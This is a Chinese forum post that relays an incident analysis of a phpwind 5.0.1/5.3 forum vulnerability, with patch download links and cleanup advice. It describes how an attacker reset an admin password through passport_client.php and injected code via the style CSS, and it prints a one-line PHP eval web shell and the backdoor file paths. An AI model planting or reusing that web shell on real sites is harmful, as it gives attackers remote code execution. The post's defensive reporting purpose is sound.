PW论坛最新漏洞,新补丁已经发布

这几天大量PW论坛被黑,

华夏黑客网还给出了相关教程及工具,

上官网查看后发现一个简单分析帖子,

引用自
大概情况如下:

攻击者IP如下:219.147.205.124 所在的地理位置为: 黑龙江省牡丹江市 电信

攻击者(以下简称JR)首先通过BAIDU查找肉鸡

该JR使用的关键字是  魔兽 公会 powered by phpwind

(估计是想盗号。。)

然后向passport_client.php页面POST了异常数据,测试过我的论坛没有打补丁后

浏览论坛找到我的管理员帐号

再次向passport_client.php页面POST了攻击代码

成功修改了我的管理员密码,进入后台

在论坛默认风格的CSS代码最后加入攻击代码

(具体代码不公布了,就是生成一个data/bbscache/admin_recors.php文件,

里面的内容是:

Copy code

<?php eval($_POST[a])?>

后面他还访问了如下地址:

/data/bbscache/admin_recors.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42

/data/bbscache/admin_recors.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42

最后通过

data/bbscache/require.php?action=editfile&amp;dir=.&amp;editfile=admin_record.php

撰改了后台管理记录

简单的说,大家首先要查的,是论坛风格的CSS代码,清除掉,然后再删除上面提到的几个后门文件

官网已经给出相关补丁及说明,

各位尚未打上补丁的最好速度去下,

引用自
安全等级: 高 (为了保证您的网站安全,请务必使用此补丁包!)

影响版本:5.0.1,5.3

补丁使用说明: 解压缩补丁包后将里面的upload目录覆盖论坛目录即可!

5.0.1 版补丁下载地址: http://www.phpwind.com/5.0/safe_repair.zip

5.3 版补丁下载地址: http://www.phpwind.com/5.3/safe_repair.zip

Quote:

补丁包对造成本次安全问题的几处变量进行了过滤,进一步防止漏洞被黑客利用,请大家放心,使用补丁包即可解决安全问题!

如:message.php 第22行

$readmsg = $delmsg = $pages = &#39;&#39;;

对 $readmsg,$delmsg,$pages 三个变量进行过滤,防止变量未初始化而被构造